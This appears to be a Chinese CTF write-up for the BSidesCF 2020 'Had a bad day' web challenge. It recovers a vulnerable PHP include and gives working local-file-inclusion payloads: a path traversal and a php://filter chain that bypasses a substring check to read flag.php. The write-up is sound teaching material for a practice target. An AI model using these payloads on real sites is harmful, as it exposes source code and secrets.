[BSidesCF 2020]Had a bad day

web第40题
[BSidesCF 2020]Had a bad day
打开靶场:
在这里插入图片描述
点击链接
在这里插入图片描述
发现有参数传递。考虑命令执行和sql注入的可能

尝试使用php://filter读取文件
原理介绍:php://filter 的使用
尝试读取index.php。发现报错

php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述
根据提示信息,可能自动给文件加上了.php后缀,去掉自己写的文件后缀,再次尝试:
在这里插入图片描述
得到base64加密后的index.php文件的源码
解码得到index.php的源码:

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

代码审计:
strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)

就是说category参数的值必须包含woofers或者meowers或者index,否则不能读取
尝试payload:

?category=woofers/../flag

…/代表上一层目录,这样写后include会返回woofers的同级目录将flag.php文件包含进来
在这里插入图片描述
发现提示,说明flag.php被包含进来了
经过了解,发现php://filter中可以嵌套一层woofers用来绕过检测并且不会影响读取,payload:

?category=php://filter/read=convert.base64-encode/woofers/resource=flag

在这里插入图片描述

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值